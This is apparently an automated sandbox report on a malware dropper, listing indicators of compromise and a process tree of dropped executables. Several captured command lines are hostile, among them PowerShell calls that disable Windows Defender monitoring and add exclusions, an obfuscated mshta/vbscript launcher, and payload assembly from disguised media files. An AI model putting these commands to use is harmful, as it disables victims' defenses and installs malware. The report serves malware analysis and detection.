4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd setting.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 6412 PING.EXE -
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 586 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 623 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 454 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 480 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3344 powershell.exe 3344 powershell.exe 4200 powershell.exe 4200 powershell.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe 4060 Wed09d8d6edfaff2ac.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 3212 Explorer.EXE 5972 foldershare.exe -
Suspicious behavior: MapViewOfSection 13 IoCs
pid Process 5748 m9KuYRLsEx_AWLqP1mBvqrgu.exe 4304 wppjUuKifwe5OKIA6JpZTWg9.exe 5748 m9KuYRLsEx_AWLqP1mBvqrgu.exe 5748 m9KuYRLsEx_AWLqP1mBvqrgu.exe 4304 wppjUuKifwe5OKIA6JpZTWg9.exe 4304 wppjUuKifwe5OKIA6JpZTWg9.exe 4304 wppjUuKifwe5OKIA6JpZTWg9.exe 4976 uosNhDevxECoZCg2RjBNDOu3.exe 6560 cscript.exe 6560 cscript.exe 7084 655.exe 6560 cscript.exe 6560 cscript.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 53 IoCs
pid Process 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe 4008 msedge.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 5220 12432.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1352 svchost.exe Token: SeCreatePagefilePrivilege 1352 svchost.exe Token: SeShutdownPrivilege 1352 svchost.exe Token: SeCreatePagefilePrivilege 1352 svchost.exe Token: SeShutdownPrivilege 1352 svchost.exe Token: SeCreatePagefilePrivilege 1352 svchost.exe Token: SeCreateTokenPrivilege 3320 Wed09db0d52c38.exe Token: SeAssignPrimaryTokenPrivilege 3320 Wed09db0d52c38.exe Token: SeLockMemoryPrivilege 3320 Wed09db0d52c38.exe Token: SeIncreaseQuotaPrivilege 3320 Wed09db0d52c38.exe Token: SeMachineAccountPrivilege 3320 Wed09db0d52c38.exe Token: SeTcbPrivilege 3320 Wed09db0d52c38.exe Token: SeSecurityPrivilege 3320 Wed09db0d52c38.exe Token: SeTakeOwnershipPrivilege 3320 Wed09db0d52c38.exe Token: SeLoadDriverPrivilege 3320 Wed09db0d52c38.exe Token: SeSystemProfilePrivilege 3320 Wed09db0d52c38.exe Token: SeSystemtimePrivilege 3320 Wed09db0d52c38.exe Token: SeProfSingleProcessPrivilege 3320 Wed09db0d52c38.exe Token: SeIncBasePriorityPrivilege 3320 Wed09db0d52c38.exe Token: SeCreatePagefilePrivilege 3320 Wed09db0d52c38.exe Token: SeCreatePermanentPrivilege 3320 Wed09db0d52c38.exe Token: SeBackupPrivilege 3320 Wed09db0d52c38.exe Token: SeRestorePrivilege 3320 Wed09db0d52c38.exe Token: SeShutdownPrivilege 3320 Wed09db0d52c38.exe Token: SeDebugPrivilege 3320 Wed09db0d52c38.exe Token: SeAuditPrivilege 3320 Wed09db0d52c38.exe Token: SeSystemEnvironmentPrivilege 3320 Wed09db0d52c38.exe Token: SeChangeNotifyPrivilege 3320 Wed09db0d52c38.exe Token: SeRemoteShutdownPrivilege 3320 Wed09db0d52c38.exe Token: SeUndockPrivilege 3320 Wed09db0d52c38.exe Token: SeSyncAgentPrivilege 3320 Wed09db0d52c38.exe Token: SeEnableDelegationPrivilege 3320 Wed09db0d52c38.exe Token: SeManageVolumePrivilege 3320 Wed09db0d52c38.exe Token: SeImpersonatePrivilege 3320 Wed09db0d52c38.exe Token: SeCreateGlobalPrivilege 3320 Wed09db0d52c38.exe Token: 31 3320 Wed09db0d52c38.exe Token: 32 3320 Wed09db0d52c38.exe Token: 33 3320 Wed09db0d52c38.exe Token: 34 3320 Wed09db0d52c38.exe Token: 35 3320 Wed09db0d52c38.exe Token: SeShutdownPrivilege 4760 svchost.exe Token: SeCreatePagefilePrivilege 4760 svchost.exe Token: SeDebugPrivilege 1380 Wed096a1bff61.exe Token: SeDebugPrivilege 3344 powershell.exe Token: SeDebugPrivilege 4200 powershell.exe Token: SeDebugPrivilege 2800 Wed09b3a5ca1a712d390.exe Token: SeDebugPrivilege 3120 taskkill.exe Token: SeDebugPrivilege 5804 LpBGQQvHgLkawiCz7GISvG0P.exe Token: SeDebugPrivilege 4540 WerFault.exe Token: SeDebugPrivilege 5952 YgIqEx4XFbtnbNHkQWDzV0CA.exe Token: SeDebugPrivilege 5968 58_Gh9EN9Lb8VWqneFpJYvOy.exe Token: SeDebugPrivilege 4516 BCleanSoft82.exe Token: SeCreateTokenPrivilege 6168 Gufiwylaehu.exe Token: SeAssignPrimaryTokenPrivilege 6168 Gufiwylaehu.exe Token: SeLockMemoryPrivilege 6168 Gufiwylaehu.exe Token: SeIncreaseQuotaPrivilege 6168 Gufiwylaehu.exe Token: SeMachineAccountPrivilege 6168 Gufiwylaehu.exe Token: SeTcbPrivilege 6168 Gufiwylaehu.exe Token: SeSecurityPrivilege 6168 Gufiwylaehu.exe Token: SeTakeOwnershipPrivilege 6168 Gufiwylaehu.exe Token: SeLoadDriverPrivilege 6168 Gufiwylaehu.exe Token: SeSystemProfilePrivilege 6168 Gufiwylaehu.exe Token: SeSystemtimePrivilege 6168 Gufiwylaehu.exe Token: SeProfSingleProcessPrivilege 6168 Gufiwylaehu.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2468 Wed09e95ff6b5.exe 2468 Wed09e95ff6b5.exe 2468 AppLaunch.exe 2468 AppLaunch.exe 2468 AppLaunch.exe 2468 AppLaunch.exe 2468 AppLaunch.exe 2468 AppLaunch.exe 2468 AppLaunch.exe 4880 Wed09d27135e5a8b3b.tmp 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2468 Wed09e95ff6b5.exe 2468 Wed09e95ff6b5.exe 2468 AppLaunch.exe 2468 AppLaunch.exe 2468 AppLaunch.exe 2468 AppLaunch.exe 2468 AppLaunch.exe 2468 AppLaunch.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe 5664 run2.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 680 wrote to memory of 1472 680 setup_installer.exe 83 PID 680 wrote to memory of 1472 680 setup_installer.exe 83 PID 680 wrote to memory of 1472 680 setup_installer.exe 83 PID 1472 wrote to memory of 1512 1472 setup_install.exe 87 PID 1472 wrote to memory of 1512 1472 setup_install.exe 87 PID 1472 wrote to memory of 1512 1472 setup_install.exe 87 PID 1472 wrote to memory of 1560 1472 setup_install.exe 88 PID 1472 wrote to memory of 1560 1472 setup_install.exe 88 PID 1472 wrote to memory of 1560 1472 setup_install.exe 88 PID 1472 wrote to memory of 1408 1472 setup_install.exe 89 PID 1472 wrote to memory of 1408 1472 setup_install.exe 89 PID 1472 wrote to memory of 1408 1472 setup_install.exe 89 PID 1472 wrote to memory of 1568 1472 setup_install.exe 126 PID 1472 wrote to memory of 1568 1472 setup_install.exe 126 PID 1472 wrote to memory of 1568 1472 setup_install.exe 126 PID 1472 wrote to memory of 2260 1472 setup_install.exe 90 PID 1472 wrote to memory of 2260 1472 setup_install.exe 90 PID 1472 wrote to memory of 2260 1472 setup_install.exe 90 PID 1472 wrote to memory of 5096 1472 setup_install.exe 125 PID 1472 wrote to memory of 5096 1472 setup_install.exe 125 PID 1472 wrote to memory of 5096 1472 setup_install.exe 125 PID 1472 wrote to memory of 2256 1472 setup_install.exe 91 PID 1472 wrote to memory of 2256 1472 setup_install.exe 91 PID 1472 wrote to memory of 2256 1472 setup_install.exe 91 PID 1472 wrote to memory of 1508 1472 setup_install.exe 98 PID 1472 wrote to memory of 1508 1472 setup_install.exe 98 PID 1472 wrote to memory of 1508 1472 setup_install.exe 98 PID 1472 wrote to memory of 2244 1472 setup_install.exe 92 PID 1472 wrote to memory of 2244 1472 setup_install.exe 92 PID 1472 wrote to memory of 2244 1472 setup_install.exe 92 PID 1472 wrote to memory of 2180 1472 setup_install.exe 93 PID 1472 wrote to memory of 2180 1472 setup_install.exe 93 PID 1472 wrote to memory of 2180 1472 setup_install.exe 93 PID 1512 wrote to memory of 4200 1512 cmd.exe 97 PID 1512 wrote to memory of 4200 1512 cmd.exe 97 PID 1512 wrote to memory of 4200 1512 cmd.exe 97 PID 1472 wrote to memory of 2748 1472 setup_install.exe 94 PID 1472 wrote to memory of 2748 1472 setup_install.exe 94 PID 1472 wrote to memory of 2748 1472 setup_install.exe 94 PID 1560 wrote to memory of 3344 1560 cmd.exe 96 PID 1560 wrote to memory of 3344 1560 cmd.exe 96 PID 1560 wrote to memory of 3344 1560 cmd.exe 96 PID 1472 wrote to memory of 3924 1472 setup_install.exe 95 PID 1472 wrote to memory of 3924 1472 setup_install.exe 95 PID 1472 wrote to memory of 3924 1472 setup_install.exe 95 PID 1472 wrote to memory of 2596 1472 setup_install.exe 99 PID 1472 wrote to memory of 2596 1472 setup_install.exe 99 PID 1472 wrote to memory of 2596 1472 setup_install.exe 99 PID 1568 wrote to memory of 2800 1568 cmd.exe 124 PID 1568 wrote to memory of 2800 1568 cmd.exe 124 PID 1568 wrote to memory of 2800 1568 cmd.exe 124 PID 1472 wrote to memory of 2916 1472 setup_install.exe 123 PID 1472 wrote to memory of 2916 1472 setup_install.exe 123 PID 1472 wrote to memory of 2916 1472 setup_install.exe 123 PID 1408 wrote to memory of 1720 1408 cmd.exe 122 PID 1408 wrote to memory of 1720 1408 cmd.exe 122 PID 1472 wrote to memory of 3416 1472 setup_install.exe 100 PID 1472 wrote to memory of 3416 1472 setup_install.exe 100 PID 1472 wrote to memory of 3416 1472 setup_install.exe 100 PID 2256 wrote to memory of 4044 2256 cmd.exe 121 PID 2256 wrote to memory of 4044 2256 cmd.exe 121 PID 2256 wrote to memory of 4044 2256 cmd.exe 121 PID 2260 wrote to memory of 4060 2260 cmd.exe 120 PID 2260 wrote to memory of 4060 2260 cmd.exe 120 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 6980 attrib.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:3212 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:680 -
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4200
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3344
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09f257bb7877d00b2.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09f257bb7877d00b2.exeWed09f257bb7877d00b2.exe5⤵
- Executes dropped EXE
PID:1720
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09d8d6edfaff2ac.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09d8d6edfaff2ac.exeWed09d8d6edfaff2ac.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4060 -
C:\Users\Admin\Pictures\Adobe Films\ntvQls6W0Z9SGx99cektYOrz.exe"C:\Users\Admin\Pictures\Adobe Films\ntvQls6W0Z9SGx99cektYOrz.exe"6⤵
- Executes dropped EXE
PID:5372
-
-
C:\Users\Admin\Pictures\Adobe Films\1HegE8uhcrIdBIO7hH1TvyAE.exe"C:\Users\Admin\Pictures\Adobe Films\1HegE8uhcrIdBIO7hH1TvyAE.exe"6⤵PID:4540
-
-
C:\Users\Admin\Pictures\Adobe Films\r5y3dnbVhvaXvp9RGdw3ItuO.exe"C:\Users\Admin\Pictures\Adobe Films\r5y3dnbVhvaXvp9RGdw3ItuO.exe"6⤵
- Executes dropped EXE
PID:2852 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2852 -s 2407⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7024
-
-
-
C:\Users\Admin\Pictures\Adobe Films\VGa7nZ8cXrxZh9BQV_ujGsOW.exe"C:\Users\Admin\Pictures\Adobe Films\VGa7nZ8cXrxZh9BQV_ujGsOW.exe"6⤵
- Executes dropped EXE
PID:1120 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1120 -s 2887⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5920
-
-
-
C:\Users\Admin\Pictures\Adobe Films\LpBGQQvHgLkawiCz7GISvG0P.exe"C:\Users\Admin\Pictures\Adobe Films\LpBGQQvHgLkawiCz7GISvG0P.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5804
-
-
C:\Users\Admin\Pictures\Adobe Films\m9KuYRLsEx_AWLqP1mBvqrgu.exe"C:\Users\Admin\Pictures\Adobe Films\m9KuYRLsEx_AWLqP1mBvqrgu.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:5748
-
-
C:\Users\Admin\Pictures\Adobe Films\YVY34vY7MvHUNmB1dwA2RZLa.exe"C:\Users\Admin\Pictures\Adobe Films\YVY34vY7MvHUNmB1dwA2RZLa.exe"6⤵
- Executes dropped EXE
PID:2624 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 2447⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3424
-
-
-
C:\Users\Admin\Pictures\Adobe Films\d3iIex0FBgOMUXdGrqAqeumo.exe"C:\Users\Admin\Pictures\Adobe Films\d3iIex0FBgOMUXdGrqAqeumo.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:6004 -
C:\Windows\SysWOW64\svchost.exesvchost.exe7⤵PID:5260
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Benvenuta.wmv7⤵PID:5364
-
C:\Windows\SysWOW64\cmd.execmd8⤵PID:6548
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^cumYgySQBgxPdjFKcKawUwBIsAmBYzAvcYxZIAEmtYNfVBRWjWqBCNmzERHNFdSiOXxsRGwVuTWVhjNPJDfwzYUHnqxRTQTNuGAXimtGVt$" Allora.wmv9⤵PID:6272
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.19⤵
- Runs ping.exe
PID:6412
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comAltrove.exe.com e9⤵PID:6696
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e10⤵PID:6832
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e11⤵PID:6728
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\58_Gh9EN9Lb8VWqneFpJYvOy.exe"C:\Users\Admin\Pictures\Adobe Films\58_Gh9EN9Lb8VWqneFpJYvOy.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5968
-
-
C:\Users\Admin\Pictures\Adobe Films\uosNhDevxECoZCg2RjBNDOu3.exe"C:\Users\Admin\Pictures\Adobe Films\uosNhDevxECoZCg2RjBNDOu3.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5184 -
C:\Users\Admin\Pictures\Adobe Films\uosNhDevxECoZCg2RjBNDOu3.exe"C:\Users\Admin\Pictures\Adobe Films\uosNhDevxECoZCg2RjBNDOu3.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4976
-
-
-
C:\Users\Admin\Pictures\Adobe Films\gcqDb5zSn7BE_dUbS8yv3WOT.exe"C:\Users\Admin\Pictures\Adobe Films\gcqDb5zSn7BE_dUbS8yv3WOT.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2140 -
C:\Users\Admin\Documents\hhRo_PY9JOjFbOXY45EnaDd8.exe"C:\Users\Admin\Documents\hhRo_PY9JOjFbOXY45EnaDd8.exe"7⤵PID:7092
-
C:\Users\Admin\Pictures\Adobe Films\Y_osdk8mJb_nB0sAtjY0k2xz.exe"C:\Users\Admin\Pictures\Adobe Films\Y_osdk8mJb_nB0sAtjY0k2xz.exe"8⤵PID:7532
-
-
C:\Users\Admin\Pictures\Adobe Films\z93OlYxWWofUlmQGlsJ6Xpnz.exe"C:\Users\Admin\Pictures\Adobe Films\z93OlYxWWofUlmQGlsJ6Xpnz.exe"8⤵PID:6516
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 2409⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5688
-
-
-
C:\Users\Admin\Pictures\Adobe Films\xNtjdlK287WgXjukzr1KQeJU.exe"C:\Users\Admin\Pictures\Adobe Films\xNtjdlK287WgXjukzr1KQeJU.exe"8⤵PID:7752
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7752 -s 2809⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5388
-
-
-
C:\Users\Admin\Pictures\Adobe Films\RU2LCevvTco4nqb5RobwPnmJ.exe"C:\Users\Admin\Pictures\Adobe Films\RU2LCevvTco4nqb5RobwPnmJ.exe"8⤵PID:1192
-
-
C:\Users\Admin\Pictures\Adobe Films\RpWh1wdDSUB28_jw5ViPc12k.exe"C:\Users\Admin\Pictures\Adobe Films\RpWh1wdDSUB28_jw5ViPc12k.exe"8⤵PID:7868
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\RpWh1wdDSUB28_jw5ViPc12k.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\RpWh1wdDSUB28_jw5ViPc12k.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵PID:4956
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\RpWh1wdDSUB28_jw5ViPc12k.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\RpWh1wdDSUB28_jw5ViPc12k.exe" ) do taskkill -f -iM "%~NxM"10⤵PID:1640
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "RpWh1wdDSUB28_jw5ViPc12k.exe"11⤵
- Kills process with taskkill
PID:4384
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\OQ2lnH_66KpEXpIlJZcYWeEi.exe"C:\Users\Admin\Pictures\Adobe Films\OQ2lnH_66KpEXpIlJZcYWeEi.exe"8⤵PID:7516
-
C:\Users\Admin\Pictures\Adobe Films\OQ2lnH_66KpEXpIlJZcYWeEi.exe"C:\Users\Admin\Pictures\Adobe Films\OQ2lnH_66KpEXpIlJZcYWeEi.exe" -u9⤵PID:8172
-
-
-
C:\Users\Admin\Pictures\Adobe Films\4BF0hsnfOpSM5YBAYerqrhGy.exe"C:\Users\Admin\Pictures\Adobe Films\4BF0hsnfOpSM5YBAYerqrhGy.exe"8⤵PID:6076
-
-
C:\Users\Admin\Pictures\Adobe Films\1zQM3dQPlUbXwp5zsXr0sQ5t.exe"C:\Users\Admin\Pictures\Adobe Films\1zQM3dQPlUbXwp5zsXr0sQ5t.exe"8⤵
- Loads dropped DLL
PID:7404 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
PID:4604 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"10⤵PID:4468
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ffcc552dec0,0x7ffcc552ded0,0x7ffcc552dee011⤵PID:7672
-
